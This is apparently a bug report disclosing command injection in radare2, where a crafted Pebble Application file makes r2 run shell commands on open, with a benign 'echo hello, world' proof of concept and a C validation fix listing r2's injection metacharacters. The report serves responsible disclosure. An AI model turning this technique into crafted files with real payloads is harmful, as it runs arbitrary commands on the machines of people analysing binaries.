Environment
Mon Nov 18 18:24:50 EST 2024
radare2 5.9.7 32934 @ linux-x86-64
birth: git.5.9.6-197-g386e94dd5f 2024-11-18__23:19:30
commit: 386e94d
options: gpl -O? cs:5 cl:2 meson
Linux x86_64
Description
Well, reading the Security overview it seems there is a desire not to keep bugs secret, so here is what I stumbled upon and where I am at.
While doing some fuzzing against r2 I managed to get a few crashes. Upon debugging to figure out what was going on, I noticed that it was pulling in bytes from the binary for use in r2 command parsing. I took some time and was able to inject arbitrary shell commands into a Pebble Application file created by some fuzzers, such that when it is opened the commands run before landing at the r2 shell prompt.
I do not have any idea for a patch solution yet and am going to be pretty busy for a little over two weeks, so my progress will be limited until the start of December. If anyone has a solution or wants to work out one before me, feel free, so the bug can be promptly fixed. I am interested in helping find a solution, but work and a family vacation coming up will take most of my time. Either way, I just like finding bugs.
Test
Provided is a base64-encoded Pebble Application that will run 'echo hello, world' when opened with radare2.
echo "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" | base64 -d > example.file
radare2 example.file
ERROR: Invalid filesystem type
ERROR: Cannot mount /root
hello, world
[0x43434343]>
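As an added illustration (not radare2's own code, and not the actual Pebble loader), this is the shape a fix for the class of bug described above would take: a bounded read of a header field followed by an allow-list check before the value is ever interpolated into an r2 command string. The field offset, the 32-byte field width and the `f sym.<name>` command template are assumptions made for the example.

```c
/* Added illustration, not radare2 code: validate a field read from an
 * untrusted input file before it goes into an r2 command string. The r2
 * command parser gives meaning to ';' (separator), '`' and '$(' (output
 * substitution), '!' (run a shell command), '|' (pipe), '>' (redirect),
 * '#' (comment) and newlines, so refuse anything outside a small allow-list
 * rather than trying to escape each case. */
#include <ctype.h>
#include <stdbool.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

#define MAX_NAME 32   /* assumed width of the name field in the file header */

/* True only for a bounded, printable, identifier-like string. */
bool name_is_safe(const char *s, size_t len) {
    if (!s || len == 0 || len > MAX_NAME) return false;
    for (size_t i = 0; i < len; i++) {
        unsigned char c = (unsigned char)s[i];
        if (!isalnum(c) && c != '_' && c != '-' && c != '.') return false;
    }
    return true;
}

/* Copy a fixed-width, possibly unterminated field at `off` into a
 * NUL-terminated buffer; returns the copied length, 0 if out of bounds. */
size_t read_field(const unsigned char *buf, size_t buflen, size_t off,
                  char *out, size_t outlen) {
    if (!buf || off >= buflen || outlen == 0) return 0;
    size_t avail = buflen - off;
    size_t width = avail < MAX_NAME ? avail : MAX_NAME;
    if (width >= outlen) width = outlen - 1;
    size_t n = 0;
    while (n < width && buf[off + n] != '\0') n++;  /* stop at NUL, stay in bounds */
    memcpy(out, buf + off, n);
    out[n] = '\0';
    return n;
}

/* Build "f sym.<name>" (hypothetical template) only when the field passes
 * the check; returns false and leaves `cmd` empty otherwise. */
bool build_cmd(const unsigned char *file, size_t filelen, size_t off,
               char *cmd, size_t cmdlen) {
    char name[MAX_NAME + 1];
    if (cmdlen == 0) return false;
    cmd[0] = '\0';
    size_t n = read_field(file, filelen, off, name, sizeof name);
    if (!name_is_safe(name, n)) return false;
    snprintf(cmd, cmdlen, "f sym.%s", name);
    return true;
}
```

The check rejects the field rather than escaping it, so a file whose name carries a command separator never produces a command string at all.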